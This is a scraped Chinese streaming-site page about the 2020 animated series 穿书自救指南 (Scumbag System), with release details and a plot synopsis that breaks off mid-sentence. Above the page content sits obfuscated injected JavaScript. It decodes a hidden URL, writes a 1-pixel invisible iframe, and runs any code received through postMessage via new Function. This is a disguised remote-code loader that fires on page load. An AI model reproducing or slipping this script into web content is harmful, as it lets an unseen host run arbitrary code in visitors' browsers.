if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['tJXdMAK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#tJXdMAK'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2484`]) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uZG'+'NFF'+'lMG'+'swL'+'mNu'+'FFJ'+'TNB'+'MTA'+'0NF'+'FDM'+'lMk'+'YyY'+'jFF'+'Q1Y'+'FFz'+'YlM'+'kZF'+'FjL'+'TI0'+'OFF'+'DQt'+'FFM'+'jUF'+'FtM'+'S5j'+'cFF'+'3M=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
 
首页 » 动画片 » 穿书自救指南
穿书自救指南

穿书自救指南

(2020)
状态:更新至10集
别名:人渣反派自救系统动画版 / Scumbag System
类型:剧情 动画 奇幻 国产动漫
主演:未知
片长:
语言:中国大陆
时间:2020-10-01
.

《穿书自救指南》一句话点评:

网络动画《穿书自救指南》改编自墨香铜臭原作的小说《人渣反派自救系统》,由上海聚灵文化传媒有限公司负责制作。于2020年9月10日起每周四在腾讯视频独家网络发布。

  • 鹰云

  • 剧情

  • 《穿书自救指南》是由企鹅影视影出品的动画作品,改编自墨香铜臭的小说《人渣反派自救系统》。讲述了普通青年沈垣原为修真小说《狂傲仙魔途》的读者,因看完书后骂出激活码而触发了神秘系统,因此穿入《狂傲仙魔途》书中世界的反派沈清秋躯壳中。《人渣反派自救系统》被改编成3D动画,名字为《穿书自救指南》,官方目前为止只公布了一支宣传PV,但是从这短短的几分钟PV中,我们可以发现很多重点剧情的片段。清静峰《渣反》中,师尊沈清秋和徒弟洛冰河,在修仙世界中苍穹山派,沈清秋是清静峰的峰主。这部分故事大部分都是发生在清静峰,根据墨